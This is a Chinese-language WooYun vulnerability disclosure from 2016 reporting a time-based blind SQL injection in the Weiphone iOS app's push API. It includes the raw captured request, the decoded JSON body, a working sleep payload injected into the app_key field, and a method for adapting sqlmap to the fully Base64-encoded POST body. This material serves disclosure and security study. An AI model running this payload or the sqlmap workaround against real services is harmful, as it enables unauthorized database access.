乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-23: 细节已通知厂商并且等待厂商处理中 2016-02-28: 厂商已经主动忽略漏洞,细节向公众公开
APP安全之SQL注入
目标:威锋IOS APP检测发现以下地方存在SQL注入:
POST http://push.feng.com/index.php?r=api/client/startdevicecall HTTP/1.1Host: push.feng.comContent-Type: application/x-www-form-urlencodedConnection: keep-aliveProxy-Connection: keep-aliveAccept: */*User-Agent: WPForumPortal/4.2 (iPhone; iOS 9.2.1; Scale/2.00)Accept-Language: zh-Hans-CN;q=1Content-Length: 1555Accept-Encoding: gzip, deflatedata=eyJhcHBfa2V5IjoiYWRlOTY2ZDUxZjUyNTllZGFkMTM0NjM0N2M1MTI3NDAiLCJ2ZXJpZnkiOiI5NDljMThlMTVhZDZkMDQwZGI4MDU3N2NlNTE1NDc2ZiIsImVuY3J5cHRfZGF0YSI6IndudFFcL3hCdzZidmFFdk0xblcyeUpCM3g5cTBsSDdhdXdGRDNlcEVUN1RjRDcrbkEyWFdvTTVkcmIzM0ZJY0pOd0J6VEdhd1c3alwvVFRzWTBmYkp0N3Z4cFhhWnZmUWQyYUVNZmNvNFNObjlYQWYrTjUzVENlejNNNVUxcDBpM0tMekFlUldERUs4Z05RWjA2M1VZRG5cL1JjeHhaQlhXNWZYMUVLUGc2WUNkR093QkFpUW5jNXY1QUxXT3hOZTdmMTA3OGVNRVAxbmFcLzRROUU3RE1XWUROamQ0Q3dES3llMk1wYjZyb3Jua2VtOXlOd3RESmsyK1k4M3QwTXhzSFpRYlRTdHhncElFdHAzN0phTFZ0S1RjTW9BSlQxZkJteGFwNjZRZ0x2aExjT21IT3hYSXh0V3JnTnhhM3FNeFdHZmd0RmFxTUwwT21BWENZMm45TzlLb3ZNb0RjZWQ2RVhrbVJ3XC9hTGtWN3h6eXg1ZHdVcG1sb0hUaExDNlZQOHhIeUlMcVpNMDc5Qjd4WFBhRUs4UW15WFZjN1BFZHJ2aU9PRHZYSmhtZjk2UktEbTdXc2I1aG02UXIrOGhROFN6RUF0U3hCTkYyYndIR2FZZ2JoXC9jZDRUc2Q0WHROOGtHaHRIWDFRbnNHY2NVSFp4TmNHY1FzWHVxY24rcUtnTHl5NWlKXC9rdjNTYzZCWjhGVTExa2grblkyRWk5N1wvK1JNRWUrWlFHRFBiT3Z6Nk5OczJSdUlOUUx2YThtRWxFXC90ZHlvUVRLSHU2cCsyY1pkN0FhSmZKK1JORk4rZ1dHMEJVNjFhZklTa25FQVEwQXhSSWhsdUVrbEd6Z1F3Nnh2U2M1bXd4U2dwQVpIMENHNVNKUTUwR1RWMVFMQXM1YUkxd0twMkt3K1QxTko4VktGbFdKbkhQTFBLZENneDhHNnc0VUxNV0FLS00zeUJXRVBcL25mcUVGeHFDdDFXKytId0NKV0hTMEVJNVRlU0w3SXdtK0RISnQrTXVVMU9uclo4U3RSejdoY2FQa2NoajNyZ1JNMVBcL21YWmlGU3RzdGdmbG10NG1zZGFtTkJqYkJiOEJHOXJzdjhKZ2xnMHRsNmpMbmFFelZLME9ONUtZNWtGS0ptWFc5NlRlSG5EalJJU0M0Qk56QUlKUFwvUTFQZWozQndmbGdcL0xZV01jNCtWb0VVZ2c1dnc5akkwZWVXNmpMM0MyQlwvQkZPeTdocjhsYUFESVNcL2pwaXNyVEw0WW9CWjg0QlZPVmRsVDJSTEJhNVpOQlJtSnVoVENpQUt5TndGQ0VZNzU3XC9JTzhtbWkxZk5LRWUyaGY0d1dHS1JuTTFJSDhaZyt2dmlLSmQ3a2lxYnlEcHBsYmZWWDkyQU09In0%3D
POST部分Base64解码为:(注入参数为app_key,时间盲注)
data={"app_key":"ade966d51f5259edad1346347c512740","verify":"949c18e15ad6d040db80577ce515476f","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM="}
Payload:(延时3秒)
{"app_key":"(select(0)from(select(sleep(0)))v)\/*'+(select(0)from(select(sleep(3)))v)+'\"+(select(0)from(select(sleep(0)))v)+\"*\/","encrypt_data":"wntQ\/xBw6bvaEvM1nW2yJB3x9q0lH7auwFD3epET7TcD7+nA2XWoM5drb33FIcJNwBzTGawW7j\/TTsY0fbJt7vxpXaZvfQd2aEMfco4SNn9XAf+N53TCez3M5U1p0i3KLzAeRWDEK8gNQZ063UYDn\/RcxxZBXW5fX1EKPg6YCdGOwBAiQnc5v5ALWOxNe7f1078eMEP1na\/4Q9E7DMWYDNjd4CwDKye2Mpb6rornkem9yNwtDJk2+Y83t0MxsHZQbTStxgpIEtp37JaLVtKTcMoAJT1fBmxap66QgLvhLcOmHOxXIxtWrgNxa3qMxWGfgtFaqML0OmAXCY2n9O9KovMoDced6EXkmRw\/aLkV7xzyx5dwUpmloHThLC6VP8xHyILqZM079B7xXPaEK8QmyXVc7PEdrviOODvXJhmf96RKDm7Wsb5hm6Qr+8hQ8SzEAtSxBNF2bwHGaYgbh\/cd4Tsd4XtN8kGhtHX1QnsGccUHZxNcGcQsXuqcn+qKgLyy5iJ\/kv3Sc6BZ8FU11kh+nY2Ei97\/+RMEe+ZQGDPbOvz6NNs2RuINQLva8mElE\/tdyoQTKHu6p+2cZd7AaJfJ+RNFN+gWG0BU61afISknEAQ0AxRIhluEklGzgQw6xvSc5mwxSgpAZH0CG5SJQ50GTV1QLAs5aI1wKp2Kw+T1NJ8VKFlWJnHPLPKdCgx8G6w4ULMWAKKM3yBWEP\/nfqEFxqCt1W++HwCJWHS0EI5TeSL7Iwm+DHJt+MuU1OnrZ8StRz7hcaPkchj3rgRM1P\/mXZiFStstgflmt4msdamNBjbBb8BG9rsv8Jglg0tl6jLnaEzVK0ON5KY5kFKJmXW96TeHnDjRISC4BNzAIJP\/Q1Pej3Bwflg\/LYWMc4+VoEUgg5vw9jI0eeW6jL3C2B\/BFOy7hr8laADIS\/jpisrTL4YoBZ84BVOVdlT2RLBa5ZNBRmJuhTCiAKyNwFCEY757\/IO8mmi1fNKEe2hf4wWGKRnM1IH8Zg+vviKJd7kiqbyDpplbfVX92AM=","verify":"949c18e15ad6d040db80577ce515476f"}
POST /index.php?r=api/client/startdevicecall HTTP/1.1Content-Length: 1673Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://push.feng.com/index.php?r=api/client/startdevicecallHost: push.feng.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*data=eyJhcHBfa2V5IjoiKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KVwvKicrKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KSsnXCIrKHNlbGVjdCgwKWZyb20oc2VsZWN0KHNsZWVwKDApKSl2KStcIipcLyIsImVuY3J5cHRfZGF0YSI6IndudFFcL3hCdzZidmFFdk0xblcyeUpCM3g5cTBsSDdhdXdGRDNlcEVUN1RjRDcrbkEyWFdvTTVkcmIzM0ZJY0pOd0J6VEdhd1c3alwvVFRzWTBmYkp0N3Z4cFhhWnZmUWQyYUVNZmNvNFNObjlYQWYrTjUzVENlejNNNVUxcDBpM0tMekFlUldERUs4Z05RWjA2M1VZRG5cL1JjeHhaQlhXNWZYMUVLUGc2WUNkR093QkFpUW5jNXY1QUxXT3hOZTdmMTA3OGVNRVAxbmFcLzRROUU3RE1XWUROamQ0Q3dES3llMk1wYjZyb3Jua2VtOXlOd3RESmsyK1k4M3QwTXhzSFpRYlRTdHhncElFdHAzN0phTFZ0S1RjTW9BSlQxZkJteGFwNjZRZ0x2aExjT21IT3hYSXh0V3JnTnhhM3FNeFdHZmd0RmFxTUwwT21BWENZMm45TzlLb3ZNb0RjZWQ2RVhrbVJ3XC9hTGtWN3h6eXg1ZHdVcG1sb0hUaExDNlZQOHhIeUlMcVpNMDc5Qjd4WFBhRUs4UW15WFZjN1BFZHJ2aU9PRHZYSmhtZjk2UktEbTdXc2I1aG02UXIrOGhROFN6RUF0U3hCTkYyYndIR2FZZ2JoXC9jZDRUc2Q0WHROOGtHaHRIWDFRbnNHY2NVSFp4TmNHY1FzWHVxY24rcUtnTHl5NWlKXC9rdjNTYzZCWjhGVTExa2grblkyRWk5N1wvK1JNRWUrWlFHRFBiT3Z6Nk5OczJSdUlOUUx2YThtRWxFXC90ZHlvUVRLSHU2cCsyY1pkN0FhSmZKK1JORk4rZ1dHMEJVNjFhZklTa25FQVEwQXhSSWhsdUVrbEd6Z1F3Nnh2U2M1bXd4U2dwQVpIMENHNVNKUTUwR1RWMVFMQXM1YUkxd0twMkt3K1QxTko4VktGbFdKbkhQTFBLZENneDhHNnc0VUxNV0FLS00zeUJXRVBcL25mcUVGeHFDdDFXKytId0NKV0hTMEVJNVRlU0w3SXdtK0RISnQrTXVVMU9uclo4U3RSejdoY2FQa2NoajNyZ1JNMVBcL21YWmlGU3RzdGdmbG10NG1zZGFtTkJqYkJiOEJHOXJzdjhKZ2xnMHRsNmpMbmFFelZLME9ONUtZNWtGS0ptWFc5NlRlSG5EalJJU0M0Qk56QUlKUFwvUTFQZWozQndmbGdcL0xZV01jNCtWb0VVZ2c1dnc5akkwZWVXNmpMM0MyQlwvQkZPeTdocjhsYUFESVNcL2pwaXNyVEw0WW9CWjg0QlZPVmRsVDJSTEJhNVpOQlJtSnVoVENpQUt5TndGQ0VZNzU3XC9JTzhtbWkxZk5LRWUyaGY0d1dHS1JuTTFJSDhaZyt2dmlLSmQ3a2lxYnlEcHBsYmZWWDkyQU09IiwidmVyaWZ5IjoiOTQ5YzE4ZTE1YWQ2ZDA0MGRiODA1NzdjZTUxNTQ3NmYifQ%3d%3d
由于SQLMAP的base64encode只编码Payload部分,而此处为全POST部分编码,因此不能直接调用SQLMap。于是调用了个Python代理接口,把SQLMAP流量代理过来,然后进行批量修改,程序中自行base64编码即可~
new_postdata='data+'+base64.b64encode(old_postdata[5:])
最后以数据库名为证
请多指教~
危害等级:无影响厂商忽略
忽略时间:2016-02-28 13:50
漏洞Rank:15 (WooYun评价)
暂无